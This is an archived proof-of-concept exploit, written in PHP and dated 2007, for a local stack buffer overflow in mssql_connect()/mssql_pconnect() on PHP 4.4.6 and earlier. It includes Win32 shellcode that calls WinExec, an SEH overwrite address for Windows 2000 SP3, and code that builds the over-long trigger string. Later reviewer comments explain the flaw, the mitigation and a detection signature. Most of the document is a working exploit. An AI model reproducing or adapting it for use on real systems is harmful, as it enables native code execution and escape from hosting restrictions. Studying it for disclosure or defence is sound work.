
php_446_mssql_connect_bof.txt

Posted on 09 March 2007

<?php
// PHP <= 4.4.6 mssql_connect() & mssql_pconnect() local buffer overflow
// poc exploit (and safe_mode bypass)
// windows 2000 sp3 en / seh overwrite
// by rgod
// site: http://retrogod.altervista.org
// u can easily adjust for php5
// this as my little contribute to MOPB
//
// Reviewer notes (defensive context, added on review):
// - What is being demonstrated: the server-name argument of
//   mssql_connect()/mssql_pconnect() was not length-checked before being
//   copied into a fixed-size stack buffer, so a single over-long string
//   argument corrupts the stack. The header above scopes the PoC to
//   PHP <= 4.4.6 on Windows 2000 SP3; the hard-coded address below is
//   specific to that build and the PoC is not expected to run elsewhere.
// - "local" means the attacker already executes PHP on the host (typical
//   shared-hosting scenario); the impact is escaping safe_mode and running
//   native code with the web server's privileges, not a remote attack.
// - Mitigation: upgrade PHP beyond 4.4.6. safe_mode was removed in PHP 5.4
//   and ext/mssql was dropped in PHP 7, so supported releases are not
//   affected; safe_mode was never a reliable tenant-isolation boundary.
// - Observable signature: a PHP script passing a ~2.5 KB string to
//   mssql_pconnect(), followed by an interpreter crash or cmd.exe being
//   spawned from the web-server process.

// Payload bytes. The comments on the right name the Win32 APIs the
// original author intended; the trailing literal ("... start notepad & ")
// shows the demonstration only opens Notepad, i.e. a visibly benign proof.
$____scode=
"xebx1b".
"x5b".
"x31xc0".
"x50".
"x31xc0".
"x88x43x59".
"x53".
"xbbxcax73xe9x77". //WinExec
"xffxd3".
"x31xc0".
"x50".
"xbbx5cxcfxe9x77". //ExitProcess
"xffxd3".
"xe8xe0xffxffxff".
"x63x6dx64".
"x2e".
"x65".
"x78x65".
"x20x2f".
"x63x20".
"start notepad & ";

// Value appended at the end of the argument; per the header it is meant to
// overwrite the SEH record, and it is tied to the stated Windows 2000 build.
$eip="xdcxf5x12";

// Build the over-long argument: 100 bytes of leading padding, the payload,
// then filler so that the total reaches 2460 bytes before $eip is appended.
// NOTE(review): if strlen($____scode) ever exceeded 2460 the repeat count
// would go negative; the PoC does not guard against that.
$____suntzu=str_repeat("x90",100);
$____suntzu.=$____scode;
$____suntzu.=str_repeat("a",2460 - strlen($____scode));
$____suntzu.=$eip;

// The over-long server-name argument is the entire trigger; no database
// connection is needed for the overflow to occur.
mssql_pconnect($____suntzu);
?>
original url: http://retrogod.altervista.org/php_446_mssql_connect_bof.html

 
